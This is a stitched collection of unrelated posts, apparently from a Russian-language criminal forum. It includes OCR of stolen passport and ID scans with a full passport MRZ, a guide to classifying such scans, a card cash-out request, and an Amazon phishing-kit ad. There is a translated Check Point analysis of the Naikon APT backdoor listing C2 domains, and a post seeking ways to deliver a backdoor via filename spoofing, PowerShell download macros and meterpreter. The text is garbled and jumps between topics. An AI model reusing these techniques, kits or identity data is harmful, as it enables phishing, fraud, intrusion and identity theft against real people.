Crtatb/ Sex Micue HapomxeHis/ Place of birth
4/M KVIBCbKA OB/1./UKR
Jlata sugayi/ Date of issue Oprah, wo supas/ Authority
29BEP/MAR18 = ~—-3237
flava 3akin4eHHa cTpoky pii/ Date of expiry — Nignuc npeg’aBHuKa/ Holder's signature
a ., 29 BEP/MAR 28
P<UKRKRYVOVIAZ<<PAVLO<<<< <<< KKK KKK KKK KKK SKK
FM522644<2UKR8212292M28032941982122905395<02
i
samples2/asdasdasdqwfqwqweqwe.jpg
KARTU TANDA PENDUDUK
REPUBLIK INDONESIA
samples2/sadasdasdasdasdasd.jpg
\
Dre
te me) yp>>>>>>>>>>>> NTT AVZNW>> ZOTUVS
1 gp>a>>>>>>>> anol bZz0s2Wheyede ©
FT >>>v991z809701ageorze360VNN> ®
Я сохранил все данные в базу и теперь предстоить ее структурировать и написать шаблоны распознавания и тогда можно будет оценить общую эффективность. Вывожу все документы из базы с распознанным текстом в textarea под изображением:
Теперь что? Давай соберем статистику, какие слова часто употребляются в полученном сыром тексте? Пока не будем склонять падежи и строить дерево графов, просто напишем ключевые слова и создатим текстовые шаблоны. Навскидку у меня получился вот такой шаблон по странам:
Python:Copy to clipboard
['indones', 'indonesia']
['peru', ]
['pakist', 'pakistan']
['turkey', 'turkiy']
['finland', ]
['india']
['kingdom', 'ireland', 'britain']
['deutsch', 'munchen']
А так же по типу документа:
Python:Copy to clipboard
['drive', 'driving']
['passport', 'pass']
Итак, ну давай глянем выборку паспортов по какой либо стране из базы данных?
Python:Copy to clipboard
for c in countries:
for k in c:
print('Looking for: ' + k)
total = 0
for cou in c[k]:
regx = re.compile(".*"+cou+".*", re.IGNORECASE)
result = collection.find({"images.doc_text": {"$regex":regx}})
result_list = []
for doc in result:
result_list.append(doc)
finds = len(result_list)
total += finds
print('Total: ' + str(total))
Из 2825 изображений различного качества, формата, повторов получилось распознать 523 страны и 359 документов:
Spoiler: Подробнее
Looking for: Germany
Total: 6
Looking for: GB
Total: 4
Looking for: Indonesia
Total: 42
Looking for: Indonesia
Total: 351
Looking for: Peru
Total: 11
Looking for: Pakistan
Total: 54
Looking for: Turkey
Total: 53
Looking for: Finland
Total: 2
Total countries: 523
Looking doc: Driving license
Total: 134
Looking doc: Passport
Total: 225
Total docs: 359
Что вполне себе неплохие результаты для беглого скриптинга. Но маловато...
Уже более наглядно и показательно. Давайте углубимся?! Подключаем компьютерное зрение.
Нет времени на теорию о RGB, пикселях и кодирования JPG, поэтому сразу перехожу к коду. Импортируем opencv2 и numpy
Python:Copy to clipboard
import cv2
import numpy as np
Ищем совпадения по шаблону. Вырезаем опознавательные признаки из документов и складываем в виде шаблонов. У каждой страны могут быть свои шаблоны, от значков и символов до простых текстовых надписей, которые не всегда распознаются с помощью tesseract.
Находим примеры документов:
И вырезаем отличительные признаки:
Теперь давай вникнем в суть происходящего. Мы берем кусочек фото, накладываем и сверяем совпадение пикселей. Пока не берем никаких математических моделей, усреднений, медиан и пр. Но этот шаблон подойдет только к той фото, с которой он вырезан. Потому что размер, цвет и форма совершенно разные на каждом изображении каждого документа. Если прогнать шаблон по фоткам, то будет давать только одно совпадение. Как сделать шаблон более универсальным и подходящим для других изображений?
Перегоняем в черно-белое исходное изображение, а в самом шаблоне добавляем предельной резкости для выделения границ перепада.
Python:Copy to clipboard
img_base = cv2.imread(img_base_path)
img_gray = cv2.cvtColor(img_base, cv2.COLOR_BGR2GRAY)
template = cv2.imread(img_template, 0)
template = cv2.Canny(template, 100, 350)
Так же, необходимо прогнать шаблон по изображению с разным разрешением, ведь шаблон может быть вырезан с качественной фотки и в нем будет больше разрешение в пикселях, а следующее изображение, может быть с более худшим качеством и меньшим разрешением. Получается, что маленький символ может быть больше по размерам самого документа в пикселях. Поэтому изображение надо прогнать в цикле увеличивая, а потом уменьшая в масштабе, ожидая наиболее совпадения:
Python:Copy to clipboard
for scale in np.linspace(0.1, 1.0, 30)[::-1]:
resized = imutils.resize(img_gray, width=int(img_gray.shape[1] * scale))
r = img_gray.shape[1] / float(resized.shape[1])
if resized.shape[0] < h or resized.shape[1] < w:
break
edged = cv2.Canny(resized, 20, 200)
result = cv2.matchTemplate(edged, template, cv2.TM_CCOEFF)
(_, max, _, maxL) = cv2.minmaxL(result)
if True:
clone = np.dstack([contrast, contrast, contrast])
cv2.rectangle(clone, (maxL[0], maxL[1]), (maxL[0] + tW, maxL[1] + tH), (0, 0, 255), 2)
cv2.imshow("Original", clone)
cv2.imshow('Result', template)
cv2.waitKey(0)
И вот пример результата:
Из ручной выборки в 20 документов, после долгой игры с cv2.Canny было распознано 12 штук, что является уже прекрасным результатом!
Второй проход по распознанию документов с помощью не самого сложного компьютерного зрения, уже может дать эффективность до 70%
Создание шаблонов, подготовка их начертания и алгоритмы поиска можно автоматизировать, натренировав сеть, которая будет обучаться из миллиона вариантов искуственных деформаций исходных, подготовленных руками шаблонов.
Благодарю за внимание.
В памяти о старичках, уважаю, открыт к дискуссии и обсуждению.
С заботой о новичках, позволяю переписать код руками, для более лучшего
усваивания, весь исходный код приведен в статье!
Кому принципиально важно наличие 1-click Run исходников в архиве - пришлю лично в ПМ, тем, кто проголосует за эту статью на конкурсе.
Все выигранные в конкурсе деньги благодаря вашим голосам за мои статьи - пойдут на создание одного из онлайн-сервисов для форума и форумчан. Предложения принимаются.
Looking for someone able to cashout CC to BTC we ll share the card details.
Player don t waste your time.
We ll share the percentage.
Простые и интуитивно понятные сервисы для создания фейковых переписок.
Предупрежден - значит, вооружен. Могут всплывать в блеках на форумах, рипаки не дремлют.
ScreenChat- обычные смс
Fake WhatsApp Chat Generator- WhatsApp
WhatsFalse IOS- аналогично, приложение для IOS
[WhatsPrank Android](https://apkpure.com/ru/whatsprank-fake- messages/com.mobillab.fakechat.one.whatsprank)- аналогично, приложение для Android
[Fake Telegram Chat Generator](https://fakedetail.com/fake-telegram-chat- generator)- переписка в ТГ для IOS и Android (на выбор), также в разделе Social Media можно выбрать FB, Instagram, Twitter и тому подобное.
Zeoob - создание фейковых постов для FB, WhatsApp, Snapchat, Instagram, Twitter и так далее.
Также для инстаграмма программа [iOS Social Prank Direct Messages](https://apps.apple.com/ru/app/social-prank-direct- messages/id1232253441) - фейк переписка директа.
AMAZON.com - универсальный фейк с вышеперечисленными особенностями. Оригинальный дизайн + мобильная версия!
Встроен базовый антибот скрипт для блокировки ip ботов сканеров, антивирусов и т.д. Уведомления в телеграм + все логи записываются в отдельный .txt файл.
Единоразовый вход (ip вводившего свои данные жертвы блокируется) - опционально!
Жизненный цикл жертвы:
1. Страница авторизации (Email:пароль)
2. Страница ввода персональных данных (имя, фамилия, дата рождения и т.д.)
3. Страница ввода платежных реквизитов (номер карты, срок действия и т.д.)
4. Страница ввода пароля от почты
5. Редирект на оригинальный amazon.com
Требования для запуска фейка:
1. 250$ единоразовая оплата
2. Любой хостинг с поддержкой apache
Telegram: black_labo
-------------------------------------------------
AMAZON.com - universal fake with the above features. Original design + mobile version!
Added basic antibot script to block ip bots of scanners, antiviruses, etc. Notifications in telegram + all logs are saved in a separate .txt file.
A one-time login (the logged victim ip is blocked) - optional!
Vicitm way:
1. Login page (Email: password)
2. Personal details page (first name, last name, date of birth, etc.)
3. Billing details page (card number, expiration date, etc.)
4. Password of Email page
5. Redirect to original amazon.com
What you need to up this scam page:
1. 250$ one time payment
2. Any hosting with apache support
Telegram: black_labo
Возможно создать левую банковскую карту?
Чтобы не палить свои реквизиты или что можно сделать на подобие?
пишите в PM
Введение
Недавно компания Check Point Research обнаружила новые доказательства продолжающейся операции кибершпионажа против нескольких национальных правительственных организаций в Азиатско-Тихоокеанском регионе (APAC). Эта операция, которую мы смогли отнести к группе APT Naikon, использовала новый бэкдор под названием Aria-body, чтобы взять под контроль сети жертв.
В 2015 году обширный отчет ThreatConnect и Defense Group (https://threatconnect.com/blog/camerashy-intro/) показал инфраструктуру группы APT и даже разоблачил одного из членов группы. Со времени появления этого отчета не было обнаружено никаких новых данных о дальнейшей деятельности группы, предполагающей, что они либо замолчали, либо усилили акцент на скрытности, либо резко изменили свою методологию действий. То есть до сих пор.
В следующем отчете мы опишем тактику, методы, процедуры и инфраструктуру, которые использовались группой APT Naikon в течение 5 лет с момента последнего отчета, и предложим некоторое представление о том, как они смогли оставаться под наблюдением.
Прицеливание
Сравнивая с ранее сообщенной деятельностью, мы можем сделать вывод, что группа Naikon APT постоянно нацеливалась на тот же регион в последнее десятилетие. В операциях после первоначального отчета за 2015 год мы наблюдали использование бэкдора под названием Aria-body против нескольких национальных правительств, включая Австралию, Индонезию, Филиппины, Вьетнам, Таиланд, Мьянму и Бруней.
В число целевых государственных учреждений входят министерства иностранных дел, министерства науки и техники, а также государственные компании. Интересно отметить, что группа расширяет свои позиции на различных правительствах в рамках APAC, начиная атаки одного правительственного субъекта, который уже был взломан, чтобы попытаться заразить другое. В одном случае иностранное посольство неосознанно отправило зараженные вредоносным ПО документы правительству принимающей страны, показывающие, как хакеры используют доверенные, известные контакты и используют их для проникновения в новые организации и расширения своей шпионской сети.
С учетом характеристик жертв и возможностей, представленных группой, очевидно, что цель группы состоит в сборе разведданных и слежке за странами, правительства которых они нацелены. Это включает в себя не только обнаружение и сбор конкретных документов с зараженных компьютеров и сетей внутри правительственных учреждений, но также извлечение данных со съемных носителей, создание снимков экрана и запись ключей, и, конечно же, сбор украденных данных для шпионажа. И если этого было недостаточно, чтобы избежать обнаружения при доступе к удаленным серверам через чувствительные правительственные сети, группа скомпрометировала и использовала серверы в зараженных министерствах в качестве серверов управления и контроля для сбора, ретрансляции и маршрутизации похищенных данных.
Цепочки Инфекций
В ходе нашего исследования мы были свидетелями нескольких различных инфекционных цепочек, используемых для доставки тела бэкдора Aria. Наше расследование началось, когда мы обнаружили вредоносное электронное письмо, отправленное из правительственного посольства в APAC правительству штата Австралия под названием The Indians Way.doc. Этот RTF-файл, который был заражен компоновщиком эксплойтов RoyalRoad (<https://nao-sec.org/2020/01/an- overhead-view-of-the-royal-road.html>), помещает загрузчик intel.wll в папку запуска Word на целевом ПК. Загрузчик, в свою очередь, пытается загрузить и выполнить следующую полезную нагрузку с сайта spool.jtjewifyn.сom.
Это не первый случай, когда мы сталкиваемся с этой версией вредоносного программного обеспечения RoyalRoad, которое удаляет имя файла intel.wll - группа Vicious Panda APT, деятельность которой мы рассмотрели (https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/) в марте 2020 года, использует очень похожий вариант.
В целом, во время нашего исследования мы наблюдали несколько различных методов заражения:
- RTF-файл, взятый на вооружение RoyalRoad.
- Архивные файлы, которые содержат легитимный исполняемый файл и вредоносную
DLL, для использования в технике перехвата DLL с использованием легитимных
исполняемых файлов, таких как Outlook и прокси Avast, для загрузки вредоносной
DLL.
- напрямую через исполняемый файл, который служит загрузчиком.
**Примеры инфекционных цепочек
Инфраструктура**
В недавних операциях злоумышленники использовали те же услуги хостинга и DNS для большинства своих серверов C&C: GoDaddy в качестве регистратора и Alibaba для размещения инфраструктуры. В нескольких случаях злоумышленники даже использовали один и тот же IP-адрес более чем с одним доменом:
Полный обзор всей инфраструктуры доступен ниже.
[ https://research.checkpoint.com/wp-content/uploads/2020/05/maltego_naikon- scaled.jpg ](https://research.checkpoint.com/wp- content/uploads/2020/05/maltego_naikon-scaled.jpg)
Чтобы получить более четкое представление о том, как злоумышленники использовали свою инфраструктуру на протяжении многих лет, мы нанесли на карту различные вредоносные домены в соответствии с ASN, на котором они размещались, на основе периодической пассивной информации DNS. Результаты представлены на рисунке ниже:
Замечания:
- Несколько доменов были использованы очень давно.
- Несколько доменов перешли на одну и ту же новую автономную систему за
короткий промежуток времени.
- С 2019 года большая часть инфраструктуры была сосредоточена на автономной
системе 45102 (Alibaba).
- В некоторых случаях злоумышленники меняли IP-адрес/сервер на одной и той же
автономной системе (представленном двумя последовательными случайными номерами
ASN на графике).
Кроме того, одним из наиболее интересных свойств инфраструктуры, которое мы наблюдали, является возможное использование взломанных государственных инфраструктур в качестве серверов контроля и управления. В одном из проанализированных нами примеров, outllib.dll (63d64cd53f6da3fd6c5065b2902a0162), существует резервный сервер C&C, настроенный как 202.90.141.25 - IP, принадлежащий филиалу науки и техники Филиппин.
Анализ инструментов
В следующем разделе мы углубимся в технический анализ бэкдора Aria-body, используемого в течение всего наблюдаемого действия, а также анализ исполняемого файла загрузчика, который предшествует этому.
Использование загрузчика на ранней стадии заражения позволяет злоумышленникам установить постоянное присутствие в сети цели, а также выполнить базовую разведку, прежде чем использовать свои более продвинутые инструменты.
Анализ загрузчика
Функциональность тела загрузчика Aria с 2017 года существенно не изменилась, но реализация варьировалась от версии к версии. Это тело загрузчик, похоже, специально создан для бэкдора Aria.
В целом, загрузчик отвечает за следующие задачи:
- Устанавливается на постоянку через папку "Автозагрузка" или ключ реестра
"theRun" (некоторые варианты).
- Внедряет себя в другой процесс, такой как rundll32.exe и dllhost.exe
(некоторые варианты).
- Расшифровывая два больших двоичных объекта: таблицу импорта и конфигурацию
загрузчика.
- При необходимости использует алгоритм DGA.
- Связывается со встроенным/рассчитанным адресом командным центром, чтобы
получить полезную нагрузку следующего этапа.
- Расшифровавая полученную DLL полезной нагрузки (тело бэкдора Aria).
- Загружает и выполняет экспортированную функцию DLL - рассчитывается с
использованием алгоритма хеширования djb2.
Загрузчик: Конфигурация и DGA
Конфигурация загрузчика поставляется в зашифрованном виде и содержит следующую информацию: домен C&C, порт, пользовательский агент и начальное число для алгоритма генерации домена (DGA). В случае, если начальное число не равно нулю, загрузчик использует метод DGA для генерации своего домена C&C на основе начального числа и календарного дня связи. Конфигурация загрузчика дешифруется с использованием следующего алгоритма:
Python:Copy to clipboard
def decrypt_buf(buf):
k = 8
j = 5
for i in range(len(buf)):
xor_byte = (k + j) % 0xff
buf[i] = buf[i] ^ xor_byte
j = k
k = xor_byte
Метод DGA полностью описан в Приложении B.
Загрузчик: взаимодействие с командным центром
Получив домен C&C, загрузчик связывается с ним, чтобы загрузить следующий и последний этап цепочки заражения. Хотя это звучит просто, злоумышленники управляют сервером C&C в ограниченном ежедневном окне, выходя в сеть только на несколько часов каждый день, затрудняя доступ к расширенным частям цепочки заражения.
Загрузчик: полезная нагрузка следующего этапа
На следующем и последнем этапе загрузчика загруженный RAT дешифруется с использованием однобайтового ключа XOR, полученного от C&C. Как только DLL- библиотека RAT загружена и расшифрована, DLL загружается в память. Затем загрузчик проверит экспортированную функцию по жестко закодированному хеш- значению djb2 и вызовет ее при совпадении.
Анализ тела Aria
Загруженная полезная нагрузка представляет собой пользовательский RAT, получивший название Aria-body, на основе имени, данного авторами: aria-body- dllX86.dll. Хотя приведенный ниже анализ относится к 32-битному варианту вредоносного ПО, мы также обнаружили 64-битный вариант с аналогичной функциональностью.
RAT включает в себя довольно распространенные возможности бэкдора, в том числе:
- Создание/удаление файлов/каталогов
- Создание скриншота
- Поиск файла
- Запуск файлов с помощью функции ShellExecute
- Перечисление всех загруженных модулей процесса
- Сбор метаданных файлов
- Сбор списка статусов таблиц TCP и UDP.
- Закрытие сеанс TCP
- Сбор информации об ОС
- Проверка местоположения, используя checkip.amazonaws.com
- (Не обязательно) Межпроцессное взаимодействие
Некоторые из вариаций Aria-body также включают другие модули, такие как:
- Модуль сбора данных с USB
- Модуль кейлоггера для сбора исходных нажатий клавиш на устройстве ввода -
добавлен в феврале 2018 г.
- Обратный прокси модуль socks - добавлен в феврале 2018
- Модуль расширений - добавлен в декабре 2019 года
Все поддерживаемые функции бэкдора описаны в таблице приложения А.
Уникальные характеристики
В следующем разделе мы рассмотрим некоторые методы, с помощью которых был реализован бэкдор, и выделим характеристики, которые могут помочь другим исследователям распознать этот бэкдор и сопоставить его с другими образцами.
Инициализация
Как упоминалось ранее, бэкдор содержит экспортированную функцию, которую предыдущий загрузчик вызывает после загрузки полезной нагрузки в память. После выполнения бэкдора он инициализирует структуру с именем MyDerived и несколько структур, используемых для соединения HTTP и TCP.
Сбор информации
Aria-body начинает работу со сбора данных на машине жертвы, в том числе:
Имя хоста, имя компьютера, имя пользователя, имя домена, версия Windows, процессор ~ МГц, MachineGuid, 64-битный или нет, а также общедоступный IP- адрес (с помощью checkip.amazonaws.com).
Эти данные собираются в информационную структуру, которую RAT упаковывает 8-байтовым случайным образом сгенерированным паролем, который затем XOR- кодируется одним байтом.
Взаимодействие с командным центром
Связь с командным центром доступна по протоколам HTTP или TCP. Вредоносная программа решает, какой протокол использовать с помощью флага в конфигурации загрузчика. Собранные данные отправляются в домен командного центра вместе с паролем XOR и ключом XOR в следующем формате:
Независимо от того, отправлено ли сообщение по протоколу TCP или HTTP, формат содержимого одинаков. Однако при выборе HTTP используется следующий формат запроса GET:
Code:Copy to clipboard
https://%s:%d/list.html?q=<random string>
После первоначального запроса к серверу C&C бэкдор продолжает прослушивать дополнительные команды с сервера. Когда команда получена, она сопоставляется со списком команд и выполняется соответствующим образом. Полный список поддерживаемых команд доступен в Приложении А.
Outlook DLL
В ходе нашего исследования мы обнаружили еще один, совершенно уникальный вариант тела Aria, загруженный в VirusTotal с Филиппин. DLL этого варианта была названа outllib.dll, и она была частью архива RAR с именем Office.rar. Он использовал технику боковой загрузки DLL, злоупотребляя старым исполняемым файлом Outlook.
Что было необычным в этом варианте, так это тот факт, что в составе инфекционной цепочки нет загрузчика, в отличие от всех других версий Aria- body. В результате он не получал никакой конфигурации от загрузчика и включил в нее жестко закодированную конфигурацию.
Полезная нагрузка имеет два разных домена для контроля и управления
- blog.toptogear.com - который она получает путем XORинга зашифрованной
строки с байтом 0x15.
- 202.90.141.25 - IP-адрес, связанный с веб-сайтом правительства Филиппин,
который используется в случае невозможности разрешения первого домена
управления.
Этот вариант также имеет некоторые дополнительные функции, которые не включены в основной вариант Aria-body, например, модуль USB-монитора. С другой стороны, в этом варианте отсутствует компонент кейлоггера и модуль реверс-соксов, наблюдаемый с основными вариантами Aria-body. Эти данные свидетельствуют о том, что это вариант бэкдора, выходящий за рамки возможного, предназначенный для конкретной операции.
Кроме того, мы видели, что основной вариант Aria-body имеет версию, которая была скомпилирована спустя некоторое время после варианта outlib.dll, и некоторые строки в этом варианте могут предполагать, что это был тестовый вариант этой специальной версии:
Наконец, эта версия Aria-body содержит следующую строку: c:\users\bruce\desktop\20190813\arn \ agents\verinfo.h, где «ar» в «arn», возможно, означает «Aria».
Аттрибуция
Мы смогли отнести нашу кампанию к группе Naikon APT, используя несколько сходных моментов, которые мы наблюдали с ранее раскрытой информацией о деятельности Naikon, проведенной лабораторий Касперского в 2015 году. В этой оригинальной операции группа APT Naikon использовала бэкдор против различных правительственных учреждений в APAC.
В дальнейшем мы будем называть бэкдор, анализируемый Kaspersky, как XsFunction
из-за пути PDB, найденного в одном из его примеров: G:\MyProjects
xsFunction\Release\ DLL.pdb
XsFunction - полнофункциональный бэкдор, который поддерживает 48 различных команд. Это позволяет злоумышленнику получить полный контроль над компьютером жертвы, выполнять операции с файлами и процессами, выполнять команды оболочки, а также загружать и скачивать данные и дополнительные плагины.
Мы смогли найти несколько сходств с предыдущими операциями, а также специфические сходства с бэкдором XsFunction.
Сходство строк
В бэкдоре Aria-body есть несколько строк отладки, описывающих функциональность вредоносного ПО.
Некоторые из этих точных строк отладки также можно найти в бэкдоре XsFunction:
Схожесть хэшируемых функций
Загрузчики XsFunction и Aria-body используют один и тот же алгоритм хеширования djb2, чтобы определить, какую экспортируемую функцию следует запустить. В XsFunction имя этой функции - XS02, а в теле Aria — AzManager.
Сходство кода
Некоторые функции в бэкдоре Aria-body идентичны функциям, используемым в старом бэкдоре XsFunction. Одним из примеров является функция, которая собирает информацию об установленном программном обеспечении на ПК:
Инфраструктура перекрытия
Четыре из наших серверов контроля и управления имели общие IP-адреса с доменом mopo3.net. Этот домен соответствует тому же IP-адресу, что и домен, упомянутый в отчете Kaspersky: myanmartech.vicp.net.
Вывод
В этой кампании мы раскрыли последнюю итерацию того, что, по-видимому, является длительной китайской операцией против различных правительственных структур в APAC. Эта специальная кампания использовала как общие наборы инструментов, такие как RoyalRoad RTF, так и специально созданный бэкдор под названием Aria-body.
В то время как группа APT Naikon держалась под радаром в течение последних 5 лет, похоже, что они не простаивали. На самом деле совсем наоборот. Используя новую серверную инфраструктуру, постоянно меняющиеся варианты загрузчиков, загрузку файлов в оперативной памяти, а также новый бэкдор - группа Naikon APT смогла помешать аналитикам проследить их деятельность обратно к ним.
Источник: <https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-
reloaded/>
Автор перевода: yashechka
Переведено специально для портала XSS.is (c)
Коллеги, всех приветствую, опишу ситуцию, хотел бы услышать ваше мнение по данному вопросу, как говорится одна голова хорошо, а несколько еще лучше.
Вообщем имеется недетектируемый бэкдор на пайтоне в виде exe файла, либо в .py до компиляции. Вес большой почти 10 метров. Либо можно запилить обычный бэк и закриптовать его, это не проблема.
Цель получает еженедельную отчетность в виде excel отчета через телеграм.
Подскажите способ доставить бэкдор цели, что я попробовал:
Сделать картинку excel документа, поменять расширение .exe на .scr, затем
юникодом запилить подмену имени файла на marcs.xls, столкнулся со следующими
сложностями, если заливать файл на файлобменник подмена имени перестает
работать и файл начинает именоваться maxls.scr, затем при открытии дефендер
аваст сообщает что файл подозрительный ибо расширение редкоиспользуемое scr.
Кто не в курсе если поменять exe на scr приложение, в частности backdoor будет
выполняться, также как если бы он имел расширение exe.
Второй способ просто подменять иконку объекта и назвать файл необходимым для
юзера именем (то есть тем которое он ожидает), но расширение поставить scr
(так как оно редко используется и мало кто знает, обратит внимание, что-то не
так, бог его знает сколько там у этого оффиса различных форматов).
Я кстати почти уверен что цель использует Microsoft Office 2013, так как
удалось получить доступ к одной из машин, связанных косвенным образом с целью,
есть основания полагать, что они используют одно программное обеспечение.
Я пробовал создать макрос, через powershell (base64) скачивая файл и запуская его, но нет уверенности, что офис не пропатчен, а шанса на ошибку нет, нужно сто процентов подцепить на крючок цель, как говорится второго выстрела не получится сделать. Более того на тестовой машине отрабатывает АВ, даже не смотря на то что сам exe не детектится по отдельности.
Можно купить склейку с exe\doc у разного рода ребят на нашем и дружественных бордах, на как правило будет тоже самое, что я и без них делаю и опять же если офис пропатчен, сомневаюсь, что это сработает, опять же всего скорее офис старый и с торрента, так что может и обновления на него не скачивались триста лет, но мы не можем этого знать наверняка.
А и еще есть идея создать оболочку программы которая якобы делает какое то действие в котором будет заинтересована цель, но при запуске будет открывать meterpreter сессию или что то в этом роде.
Итог: Хочу услышать ваше мнение, каким образом доставить payload цели? Кто что думает? Заранее спасибо.
Я хочу скопировать и использовать сайт для ставок.как мне это сделать ??
Столкнулся на днях с такими людьми - my-gadgets.ru ( не реклама ). Оказался скам сайт. Да , сука, хороший. С карты хотели увести бабки. Мало того, что бд сами делают, так еще и пиздят деньги в рф. Короче. Если у кого есть возможность забанить их нахуй ( простите за мой французский) - сделайте пожалуйста. Всем добра
[CLIKE]Я заметил одну особенность: чем дольше я тусуюсь в телеге, тем больше
людей мне пишет с вопросами по схемам, которые они находят. Да, бывают и те,
кто предлагает свои схемы, просит помочь в реализации или просто дать им пару
советов. Но почти все они пишут примерно с одним уклоном:
[/CLIKE][CLIKE]
- "А сколько эта схема будет приносить и она вообще актуальна?"
Click to expand...
Я отвечаю всем примерно одинаково: нет плохих схем, есть ленивые или слаборазвитые люди, ведь конфетку можно сделать и из темы лихих 90-х.
Ах да, есть еще одна категория, которые считают, что для создания собственных схем нужно обладать невероятным складом ума (и, конечно, в их глазах я обладаю этим самым интеллектом). Да, это все приятно, но я вам хочу показать наглядный пример того, как вы сами можете делать новые схемы из банального паблика.
Шаг 1. Находим схему
Что бы я сюда не написал, вы все равно не поймете суть, которую я хочу до вас
донести. Точнее даже не так... Вы не глупые и поймете, но все приходит с
опытом, который я не могу передать словами. Как вы могли понять, нам нужна
схема, которая будет шаблоном. Запомните: чем больше убита схема, тем лучше у
вас будет доход после ее "переделки", поэтому лучше брать самый настоящий
паблик. Но здесь, в качестве примера, я взял не совсем паблик. Это обосновано
тем, что мне так проще донести до вас информацию. Теперь прочитайте схему и
только после этого переходите к шагу 2.
Шаг 2. Суть
Вот именно здесь и проявляется ваш склад ума. Разные люди могут видеть одни и
те же вещи иначе (и даже сейчас читатели уже разделились на категории). Нам
нужно вытащить основную мысль со схемы. Что в ней делает человек? Он реализует
онлайн-схему в оффлайн, то есть переносит ее из виртуальной реальности в
жизнь. Если вы еще не поняли о чем речь: человек хочет открыть проект, который
якобы при вложении N-суммы принесет вам в 10 раз больше денег. Закрепили эту
мысль у себя в голове и переходим к разбору внешних факторов.
Шаг 3. Окончание разбора
Теперь необходимо рассмотреть мелочи, которые описывает автор. К примеру, нам
нужно понять будет наша схема черная или белая, будем ли вкладывать средства,
рассчитать время на реализацию и доход ну и т.д. Ну раз я уже взялся
показывать пример постройки схемы, то давайте возьмем такие данные: мы готовы
вложить 15-20к, заработок будет полностью легален, от реализации до дохода нам
нужно как можно меньше времени, у нас есть 2-3 человека в нашей команде, будем
делать бюджетную рекламу, ну и достаточно.
Шаг 4 и последний. Строим схему и реализуем
Так как я пообещал обойтись без собственного склада ума, то нам нужна какая-то
библиотека, откуда мы можем взять материалы для нашей схемы. Напомню, что наша
основная мысль "онлайн-заработок в оффлайне", поэтому нам для начала нужно
найти этот самый онлайн-заработок. Идем в гугл и ищем средние по актуальности
варианты заработков. Видим всякий шлак вроде "заработай миллион, сидя на жопе"
и двигаемся дальше. Наконец, находим статью, в которой описаны основные виды
заработка: сайт, написание статей (копирайтинг/рерайтинг), реклама в соц.
сетях, партнерская программа, выполнение каких-то заданий за копейки и т.д. Из
всех этих вариантов мне больше всех нравится последний пункт, да и он выглядит
более трудным в реализации (из-за копеечных заработков и некоторых скрытых
нюансов). Никогда не ищите легких путей, никогда...
Приступаем к реализации. Вспоминаем, что у нас есть 15-20к и на них мы арендуем офис, а также небольшую часть потратим на рекламу. С таким бюджетом из рекламы у нас возможны только листовки на столбах, чем мы и займемся (а лучше наймем школьника). На самих листовках пишем привлекательное объявление для школьников и студентов, говорим о возможности совмещения с учебой, в общем всеми способами доказываем красоту способа. Вспоминаем, что если придут клиенты, нам нечего им дать и начинаем искать варианты подработки для них. Так как нам нужно вытащить онлайн-схему в оффлайн, то плотно садимся за ПК и роем гугл в поисках подробностей. Натыкаемся на предложение заработка на фотографиях, его предлагают даже крупные компании и этот вариант оплачивается намного больше, чем клики по рекламным ссылкам. И когда к нам приходят первые клиенты, мы просто выдергиваем задания с интернет-компаний, берем себе небольшой % от оплаты (то есть это и будет наш доход), озвучиваем цены школьникам (т.к там неплохие расценки, то даже после небольшого % они согласятся) и ждем отчета.
Так проходит месяц, два, три... Через полгода активной работы вы начинаете понимать, что количество желающих поработать на вас очень сильно возрастает, да и компании дают больше заданий. У вас появляется полностью налаженная схема и неплохой заработок. И только в тот момент вы вспоминаете, что начиналось все с просьбы школьнику сделать пару фотографий для Яндекса. И в то же время вы осознаете, что в городе единственный человек, у которого онлайн работа происходит в жизни.
Всем профитов, друзья![/CLIKE]
Эту историю мне рассказал Олег, знаковый персонаж, с которым я некоторое время
тесно общался в нулевых, бывший мент, бывший участник двух ОПГ
(последовательно), во второй из которых был "разводящим" (переговорщиком), и
который научил меня некоторым незаменимым приёмам и принципам переговоров с
околокриминальными личностями. Когда-нибудь я про него более обширный пост
напишу. Олег обладал (может и щас жив, хз) неповторимой харизмой, умел драться
как комбайн, и успешно делал вид, что не боится в этой жизни ничего, поэтому в
его исполнении рассказ звучал забавнее.
Как это было
Начало 90-х, платформа Энергетик (довольно криминальное в 90-х место в
Самаре), Олег, молодой мент, одетый в "гражданку", ждёт электричку. На
платформе разложил на асфальте свою картонку напёрсточник, зазывает пассажиров
поиграть. Все хмуро отворачиваются. Народ с этой платформы ездит обычно один и
тот же, напёрсточника все в лицо давно знают, и сцены развода наблюдали не
раз.
Олег, по профессиональной привычке, подмечает в толпе подставных "игроков", подставных "зрителей", и "группу поддержки" - двух-трёх крепких молодых людей, изображающих из себя незнакомых между собой обычных пассажиров, которые прессуют "клиента" в случае конфликта. Дальше от лица Олега:
- И тут на платформе появляется персонаж, каких сейчас не встретить, убили всех ещё в 90-х. Идёт троица, впереди вышагивает очень крепкий дядька в возрасте, одетый в рванину, но в дорогущем чёрном кожаном плаще до пят, а позади два мужичка, по виду явные бывшие зеки. Дядька этот, vdesyatke, не такой как мы с тобой, а на самом деле крепкий суровый дядька, всё лицо в шрамах, и черты лица навсегда застыли в выражении "если кто и отступит, то точно не я".
Напёрсточник зовёт его:
- Уважаемый, пойдём поиграем, ставка столько-то угадаешь, где шарик, выигрыш столько-то. (они обычно прибаутками разговаривают, но я их не помню, конечно - прим. автора)
Click to expand...
- Нет денег
Click to expand...
- А ты на гайку сыграй (напёрсточник указывает на дорогой золотой перстень на пальце амбала).
Click to expand...
- Тогда ты свою тоже ставь (амбал указывает на перстень напёрсточника)
Click to expand...
Народ с интересом подтягивается к столику, все подставные оживляются и готовятся участвовать в разводе.
Click to expand...
Напёрсточник секунду сомневается, пытается предложить играть на деньги, амбал стоит как скала и ждёт. Напёрсточник соглашается играть на перстень (в 90-х это было типа много денег, сейчас смешно звучит, конечно). Напёрсточник крутит стаканчики, останавливает, кричит амбалу:
- Выбирай!
Click to expand...
Толпа замирает в ожидании. Амбал делает шаг вперёд, наступает на средний стаканчик, руками поднимает два других, показывает, что под ними ничего нет, и говорит тоном, не допускающим возражений:
- Снимай гайку.
Click to expand...
